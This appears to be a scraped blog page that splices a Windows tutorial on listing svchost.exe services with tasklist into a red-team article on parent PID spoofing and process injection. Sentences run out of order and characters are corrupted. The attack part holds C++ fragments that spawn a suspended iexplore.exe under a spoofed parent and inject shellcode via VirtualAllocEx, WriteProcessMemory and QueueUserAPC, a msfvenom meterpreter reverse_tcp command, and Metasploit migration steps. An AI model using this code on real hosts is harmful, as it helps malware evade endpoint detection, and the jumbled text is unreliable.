Note that in order to output to the root of the C drive, you’ll need to open an Administrator command prompt (Start, type cmd, right-click on command prompt and choose Run as Administrator). If you want to output this to a text file, use the following command: tasklist /svc | find "svchost.exe" > c:\tasklist.txt This will generate a list of all running processes, pass that list to the find command and filter to only show the svchost.exe processes. To do this, simply open a command prompt by clicking on Start and typing in cmd.Īt the command prompt, go ahead and copy/paste the following command: tasklist /svc | find "svchost.exe" On any version of Windows, you can use the command line to generate a list of all the svchost.exe processes along with the service that is running inside each. If you are running Windows 7 or earlier, read on about other methods. This is by far the easiest way to accomplish this task, but it requires Windows 10. Now we can see that the DHCP Client service is running inside svchost.exe with a process ID of 1504. Call the CreateRemoteThread() API to create a thread into the virtual memory space of the target processĪn existing session is required to be defined with the PID and the name of the target process.This will automatically bring you to the Details tab and it will automatically select the line that corresponds to that process.Call the WriteProcessMemory() API to write the payload into the virtual memory space of the process.Call the VirtualAllocEx() API to allocate RWX memory in the target process.Call the OpenProcess() API to gain access to the virtual memory of the target process.Retrieve the payload from the existing process. Check if Meterpreter session has the SeDebugPrivilege.Check the architecture of the target process (32bit or 64bit).Specifically the module will follow the process below: The module will follow the same functions as the other tooling described in this article in order to rewrite the existing shellcode into the address space of another process. Metasploit framework contains a post exploitation module which can be used to migrate an existing Meterpreter session to another process on the system. Macro Scheduled Task – Process Properties Metasploit QueueUserAPC((PAPCFUNC)lpBaseAddress, pInfo.hThread, NULL) LPVOID lpBaseAddress = (LPVOID)VirtualAllocEx(pInfo.hProcess, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE) īOOL resWPM = WriteProcessMemory(pInfo.hProcess, lpBaseAddress, (LPVOID)shellCode, sizeof(shellCode), lpNumberOfBytesWritten) = sizeof(STARTUPINFOEXA) ĬreateProcessA("C:\\Program Files\\internet explorer\\iexplore.exe", NULL, NULL, NULL, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, reinterpret_cast(&sInfoEX), &pInfo) UpdateProcThreadAttribute(sInfoEX.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &expHandle, sizeof(HANDLE), NULL, NULL) InitializeProcThreadAttributeList(sInfoEX.lpAttributeList, 1, 0, &sizeT) SInfoEX.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, sizeT) InitializeProcThreadAttributeList(NULL, 1, 0, &sizeT) ZeroMemory(&sInfoEX, sizeof(STARTUPINFOEXA)) HANDLE expHandle = OpenProcess(PROCESS_ALL_ACCESS, false, getParentProcessID()) Shellcode, for example msfvenom -p windows/圆4/meterpreter/reverse_tcp LHOST=x.x.x.x EXITFUNC=thread -f c If (Process32First(snapshot, &process)) while (Process32Next(snapshot, &process)) HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) The “ CreateProcess” function was used in conjunction with the “ STARTUPINFOEX” and “ LPPROC_Thread_ATTRIBUTE_LIST“. A proof of concept written in C++ was released ( SelectMyParent) that could allow the user to select the parent process by specifying the PID (process identifier). Originally this technique was introduced into the wider information security audience in 2009 by Didier Stevens. This means that a malicious process can use a different parent when it is created from the one that is actually executed. The Windows API call “ CreateProcess” supports a parameter which allows the user to assign the Parent PID. This has lead red teams and adversaries to use parent PID spoofing as an evasion method. Various EDR’s (endpoint detection and response) can detect this abnormal activity easily. For example if PowerShell is the child process and Microsoft Word is the parent then it is an indication of compromise. Monitoring the relationships between parent and child processes is very common technique for threat hunting teams to detect malicious activities.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |